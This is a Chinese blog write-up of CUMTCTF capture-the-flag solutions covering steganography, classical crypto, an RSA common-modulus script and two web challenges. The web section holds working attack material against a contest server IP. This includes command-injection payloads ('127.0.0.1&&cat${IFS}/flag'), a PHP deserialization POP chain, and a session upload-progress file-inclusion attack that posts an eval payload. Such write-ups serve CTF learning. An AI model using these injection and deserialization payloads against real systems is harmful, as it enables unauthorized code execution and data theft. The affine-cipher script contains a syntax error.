follow my dream

CUMTCTF竞赛平台

ctf web cumt
字数统计: 1k阅读时长: 5 min
2020/01/07 Share

misc

你可劲找之word

  • 在kali 中打开
  • 打开document.xml
  • flag{cumtctf_IS_niubility}

    你可劲找之JPG

    用010editer查看,便可发现flagflag{flag_!s_here_aaaaa}

    你可劲找之淘宝买买买

    先爆破zip密码,为1909nb
    后用SNOW.EXE PS C:\snwdos32> .\SNOW.EXE -C .\taobao.html cumtctf{snow_IS_so_white}

    你可劲找之音乐贼好听

  • 打开txt文件,反序得图片
  • 补全二维码,得BxS1909
  • Decode.exe -X -P 'BxS1909' speaker.mp3

    你可劲找之大鲨鱼来了

  • 数据包,先在字节流中 搜索 flag 字符串
  • 拼接flag flag{Icmp_backdoor_can_transfer-some_infomation}

    CRYPTO

    星星的低语

  • 密文Qswfzuu_wk_yau?!
  • 密匙ghost
  • 维吉尼亚解密得flagCUMTCTF{Klingon_is_fun?!}

    EasyRSA

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# -*- coding: utf-8 -*-
from gmpy2 import invert
import binascii 
def gongmogongji(n, c1, c2, e1, e2):
    def egcd(a, b):
        if b == 0:
            return a, 0
        else:
            x, y = egcd(b, a % b)
            return y, x - (a // b) * y
    s = egcd(e1, e2)
    s1 = s[0]
    s2 = s[1]

    # 求模反元素
    if s1 < 0:
        s1 = - s1
        c1 = invert(c1, n)
    elif s2 < 0:
        s2 = - s2
        c2 = invert(c2, n)
    m = pow(c1, s1, n) * pow(c2, s2, n) % n
    return m

c1=8454183967325114702871606020371893044643730848194421087800555329951749548122339370132406738438445748436613875684020078481120800301115768203669597144997733800335384024451758569713148077498773356000202354950315565733238107631918065866000666543639581410947467826793138310934187582903203581147191018919872761778285965302617242724210250702053620543591080088403287542360743392129404353088927828568618521099909157542189940186062740901165582685911913496261428049266993355399200458969282547528002146757745487534561043968844285589219887599453366653980861533030050776967395711234608754210628749429707754565377212941836511464698
c2=3474896545293913347667202223451565153852862129794344030200798688166203177565324486722621485505590942555081101762105348054858307764466250576794351605801560468579220594430471412245417182169425232767469252787915312915663322118392070561689481437976881213082255419441547071435443309213796735780603082347566527154600699672908140809936545765094124072879172773255195232516309146970129665290633260997334593298334430430898595943117986308303640513184694554167523992959853810866556034559033529469961279555546599869458610138758291003488308546823595786705144504162047084575649567675866387296272750353993133512245405497044906025497
n=15409179157709387241557822685426841443579313151672696544378035820627466617508122062530604139946669340728697620999406940282215117633367743233931254718933601150667815157829687259236246472336122252622342727296574578441506307923356119023632658875925317157796384903071654748687628503417628946352328486576603038386661099039350318676174733827586996443060446551088315380331434077186356265756497177470964732140897803977195640723451121610236945525050901485824618145624534940660537469868358175524552404233477850296944812441656863987279954083829550858880562581730570562695967912408470110382783785378042546294512445145741950785599
e1=35807
e2=64109
result = gongmogongji(n, c1, c2, e1, e2)
print(result)
print(hex(143822866208467685915742288235397526795410934392605167552521980813958173929763589128464185639973245))
print(binascii.unhexlify(b'43554d544354467b30333762316139633137353339383764353138343533373266366366313862317d'))

仿射密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#encoding:utf-8

def NI(x,b): #定义求x关于b的逆元的函数NI,其中(NI(x,b)*x) mod b = 1 当x和b互质时求出的逆元唯一
    i = 1
    while (x*i)%b != 1:
        i = i + 1
    return i

c = "cejldputgtbjwrfhpttnt"
C = []

#对密文进行预处理并储存在列表中,储存形式是对应字母在26个英文字母中的位序
for i in c:
    if i == ' ':
        C.append(i)
    else:
        C.append(ord(i)-65)

#将加密算法中a可能的取值储存在列表中
a = [3,5,7,9,11,15,17,19,21,23,25]
P = []

for keyb in range(0,26):
    for keya in a:
        ni_a = NI(keya,26)
        for s in C:
            if s == ' ':
                P.append(' ')
            else:
                P.append(((s-keyb)*ni_a)%26) #将明文字母对应的位次码依次加入到明文列表中
        strP = ''
        for t in P:
            if t==' ':
                strP = strP + ' '
            else:+~~
                strP = strP + chr(t+97) #将明文转化为字符串并输出
        print(strP)
        P = []

web

Blizzard

  • 根据提示用SNOW读取html隐写部分/Secr3t_P4th/index.html
  • 根据robots.txt,下载wake_100.txt
  • 用该字典对http://202.119.201.199:60000/Secr3t_P4th/index.html进行爆破,得ping.php
  • 在ping.php 中命令执行
  • 读取跟目录127.0.0.1&&ls${IFS}/
  • 读取flag127.0.0.1&&cat${IFS}/flag
  • cumtctf{A1l_R0ads_L3ad_t0_R0me}

Unserialize

  • 构造pop链查看phpinfo
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    <?php
    session_start();
    //step_1  查看phpinfo
    class A
    {
            public $cumt;
            public $bxs;
            public $mytoken;
            public $yourtoken;
            public function __construct()
            {
                $this->cumt = new B();
                $this->yourtoken = & $this->mytoken;

            }
    }
    class B
    {
            public $cumt;
            public $bxs;
            public function __construct()
            {
                $this->cumt = new C();
            }
    }
    class C
    {
            public $cumt;
            public $bxs;
            public function __construct()
            {
                $this->cumt = new F();
            }
    }
    class F
    {
            public $cumt;
            public $filename;
    }

    $a = new A();
    $str = serialize($a);
    echo $str;
    //O:1:"A":4:{s:4:"cumt";O:1:"B":2:{s:4:"cumt";O:1:"C":2:{s:4:"cumt";O:1:"F":2:{s:4:"cumt";N;s:8:"filename";N;}s:3:"bxs";N;}s:3:"bxs";N;}s:3:"bxs";N;s:7:"mytoken";N;s:9:"yourtoken";R:10;}
    ?>

session.upload_progress.enabled on
session.upload_progress.cleanup on
session.save_path /var/lib/php5/sess_.PASSID

  • 根据你的phpsessid构建poc2

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    <?php
    //http://202.119.201.199:50000/
    //利用session.upload_progress进行文件包含利用
    session_start();
    class A
    {
            public $cumt;
            public $bxs;
            public $mytoken;
            public $yourtoken;
            public function __construct()
            {
                $this->cumt = new B();
                $this->yourtoken = & $this->mytoken;
            }
    }
    class B
    {
            public $cumt;
            public $bxs;
            public function __construct()
            {
                $this->cumt = new C();
            }
    }
    class C
    {
            public $cumt;
            public $bxs;
            public function __construct()
            {
                $this->cumt = new D();
            }
    }
    class D
    {
            public $cumt;
            public $bxs;
            public function __construct()
            {
                $this->cumt = new E();
            }
    }
    class E
    {
            public $cumt;
            public $bxs;
            public function __construct()
            {
                $this->cumt = new F();
            }
    }
    class F
    {
            public $cumt;
            public $filename;
            
            public function __construct()
            {
                $this->filename = "/var/lib/php5/sess_"."your_phpsessiD";
            }

            public function get_something()
            {
                $_GET['data'] = "$this->filename";        
                if (include_once($_GET['data']))         
                {              
                    include_once($_GET['data']); 
                }  
                else 
                { 
                    echo "Hack!"; 
                }    
            }
            public function __invoke()
            {
                phpinfo();     
            }

    }

    $a = new A();
    $str = serialize($a);
    //echo urlencode($str);
    echo $str;
    ?>

  • 同时post user=<?php eval("phpinfo();")?> ,此处以phpinfo函数为例。

推荐阅读:
freebufcnblogs

原文作者:fe1w0

原文链接:https://fe1w0.github.io/2020/01/07/CUMTCTF%E7%AB%9E%E8%B5%9B%E5%B9%B3%E5%8F%B0/

发表日期:January 7th 2020, 4:50:12 pm

更新日期:March 15th 2021, 12:20:07 am

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. misc
    1. 1.1. 你可劲找之word
    2. 1.2. 你可劲找之JPG
    3. 1.3. 你可劲找之淘宝买买买
    4. 1.4. 你可劲找之音乐贼好听
    5. 1.5. 你可劲找之大鲨鱼来了
  2. 2. CRYPTO
    1. 2.1. 星星的低语
    2. 2.2. EasyRSA
    3. 2.3. 仿射密码
  3. 3. web
    1. 3.1. Blizzard
    2. 3.2. Unserialize
Total : 48
2021
2020
2019
ctf web sql-injection ssti python misc cumt Windows PHP-Parser php Struts2 xss labs life flask crypto git Socks Tools c/c++ 流量分析 mysql udf 信安之路 mysql 通达OA fastjson thinkphp 内网渗透 红日靶场 buuctf docker curl weblogic WEB环境搭建 bypass_open_basedir bypass_disable_function
2020-ctf 2020-ctf 2019-ctf 2021-ctf 漏洞复现 PHP XSS life flask git 项目-工具 SQLI 内网渗透 基础知识 upload 环境搭建